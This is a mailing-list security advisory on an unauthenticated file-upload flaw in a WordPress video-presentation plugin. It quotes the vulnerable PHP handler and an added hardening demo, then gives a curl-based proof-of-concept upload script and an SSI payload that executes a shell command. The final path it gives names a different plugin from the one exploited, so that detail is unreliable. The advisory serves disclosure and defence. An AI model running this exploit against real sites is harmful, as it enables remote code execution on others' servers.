List: full-disclosure
Subject: [FD] Remote file upload vulnerability in wordpress plugin videowhisper-video-presentation v3.31.17
From: "Larry W. Cashdollar" <larry0 () me ! com>
Date: 2015-04-01 0:16:26
Message-ID: DE70A83E-3C00-4E96-B79F-7E403BE2B0C6 () me ! com
Title: Remote file upload vulnerability in wordpress plugin videowhisper-video-presentation v3.31.17
Author: Larry W. Cashdollar, @_larry0
Date: 2015-03-29
Download Site: https://wordpress.org/plugins/videowhisper-video-presentation/
Vendor: http://www.videowhisper.com/
Vendor Notified: 2015-03-31, won't fix, http://www.videowhisper.com/tickets_view.php?t=10019545-1427810822
Vendor Contact: http://www.videowhisper.com/tickets_submit.php
Advisory: http://www.vapid.dhs.org/advisory.php?v=117
Description: from the site
"VideoWhisper Video Consultation is a web based video communication solution designed for online video consultations, interactive live presentations, trainings, webinars, coaching and online collaboration with webcam support. Read more on WordPress Video Presentation plugin home page."
Vulnerability:
wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php allows various remote, unauthenticated file uploads. Among the permitted file types is html, and only the last 4 characters of the file name are compared against the list of allowed types, so .shtml passes the check and gives remote code execution if SSI is enabled. The code does no user access validation, so anyone can upload the following file types to an unsuspecting wordpress site: .shtml, .swf, .zip, .rar, .jpg, jpeg, .png, .gif, .txt, .doc, docx, .htm, html, .pdf, .mp3, .flv, .avi, .mpg, .ppt, .pps

The check

if (strstr($filename,'.php')) exit;

can be bypassed by using the extension .Php, though the extension check then only passes names ending in an allowed type, such as test.Php.shtml.

The upload handler, vw_upload.php:

<?php
if ($_GET["room"]) $room=$_GET["room"];
if ($_POST["room"]) $room=$_POST["room"];
$filename=$_FILES['vw_file']['name'];
include_once("incsan.php");
sanV($room);
if (!$room) exit;
sanV($filename);
if (!$filename) exit;
if (strstr($filename,'.php')) exit; //do not allow uploads to other folders   (case-sensitive: ".Php" is not matched)
if ( strstr($room,"/") || strstr($room,"..") ) exit;
if ( strstr($filename,"/") || strstr($filename,"..") ) exit;
$destination="uploads/".$room."/";
if ($_GET["slides"]) $destination .= "slides/";
$ext=strtolower(substr($filename,-4));   // only the last 4 characters of the name are checked
$allowed=array(".swf",".zip",".rar",".jpg","jpeg",".png",".gif",".txt",".doc","docx",".htm","html",".pdf",".mp3",".flv",".avi",".mpg",".ppt",".pps");
if (in_array($ext,$allowed)) move_uploaded_file($_FILES['vw_file']['tmp_name'], $destination . $filename);
?>loadstatus=1
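To make the weakness in the extension check concrete, here is an added example that is not part of the advisory or of the plugin's code. vw_original_allows() reproduces the quoted check, and hardened_allows() is an assumed stricter replacement; both function names, the allow-lists and the sample file names are constructed for this illustration.

```php
<?php
// Added example, not code from the advisory or the VideoWhisper plugin.
// vw_original_allows() reproduces the extension check quoted in the advisory;
// hardened_allows() is an assumed stricter replacement. Run: php upload_check_demo.php

/**
 * The plugin's check as quoted above: a case-sensitive search for ".php",
 * then a comparison of only the last four characters of the name.
 */
function vw_original_allows(string $filename): bool
{
    if (strstr($filename, '.php')) {            // case-sensitive: ".Php" slips through
        return false;
    }
    $ext = strtolower(substr($filename, -4));   // ".shtml" ends in "html", so it matches
    $allowed = array(".swf", ".zip", ".rar", ".jpg", "jpeg", ".png", ".gif", ".txt", ".doc",
                     "docx", ".htm", "html", ".pdf", ".mp3", ".flv", ".avi", ".mpg", ".ppt", ".pps");
    return in_array($ext, $allowed, true);
}

/**
 * Assumed hardened check: reject traversal characters, take the whole final
 * extension, lower-case it, require an exact match against a list of passive
 * document/media types, and refuse any earlier dotted component that a web
 * server might execute or interpret (double extensions, SSI, etc.).
 */
function hardened_allows(string $filename): bool
{
    if ($filename === '' || strpbrk($filename, "/\\\0") !== false || strpos($filename, '..') !== false) {
        return false;
    }
    $parts = explode('.', $filename);
    if (count($parts) < 2 || $parts[0] === '') {
        return false;                           // no extension, or a dot-file
    }
    $ext = strtolower(array_pop($parts));
    // No html/htm/shtml (SSI), no swf, no archives: only types the server serves inertly.
    $allowed = ['jpg', 'jpeg', 'png', 'gif', 'txt', 'pdf', 'mp3', 'flv', 'avi', 'mpg', 'ppt', 'pps', 'doc', 'docx'];
    if (!in_array($ext, $allowed, true)) {
        return false;
    }
    $interpreted = ['php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar',
                    'shtml', 'shtm', 'htm', 'html', 'cgi', 'pl', 'py', 'js', 'svg'];
    foreach ($parts as $component) {
        if (in_array(strtolower($component), $interpreted, true)) {
            return false;                       // e.g. shell.Php.jpg on multi-extension hosts
        }
    }
    return true;
}

/** Runs constructed file names through both checks; returns true if every expectation holds. */
function run_demo(): bool
{
    // constructed sample names => [original check result, hardened check result]
    $cases = [
        'deck.pdf'       => [true,  true],
        'slide.jpeg'     => [true,  true],
        'shell.php'      => [false, false],   // the one case the original catches
        'page.html'      => [true,  false],   // plain html is SSI-capable on some hosts
        'test.Php.shtml' => [true,  false],   // the advisory's bypass
        'shell.Php.jpg'  => [true,  false],   // mixed-case ".Php" evades strstr()
    ];
    $ok = true;
    foreach ($cases as $name => [$expectOrig, $expectHard]) {
        $orig = vw_original_allows($name);
        $hard = hardened_allows($name);
        printf("%-16s original=%-5s hardened=%-5s\n", $name,
               $orig ? 'allow' : 'deny', $hard ? 'allow' : 'deny');
        $ok = $ok && $orig === $expectOrig && $hard === $expectHard;
    }
    return $ok;
}

exit(run_demo() ? 0 : 1);
```

The hardened variant only addresses the extension check. Because the advisory's central point is that vw_upload.php performs no access validation at all, a WordPress upload handler would additionally need an authorization gate before any file is written, for instance current_user_can('upload_files') together with a nonce check such as check_ajax_referer().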
CVEID: TBD
OSVDB: TBD
Exploit Code:
videowhis_poc.php
<?php
$uploadfile="upexp.shtml";
$ch = curl_init("http://target_site/wp-content/plugins/videowhisper-video-presentation/vp/vw_upload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('vw_file'=>"@$uploadfile",'name'=>'upexp.shtml','room'=>'.'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
upexp.shtml
<html>
<!--#exec cmd="/usr/bin/date > /tmp/p" -->
this is html
</html>
The executable should be located in wordpress/wp-content/plugins/videowhisper-video-conference-integration/vc/uploads
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/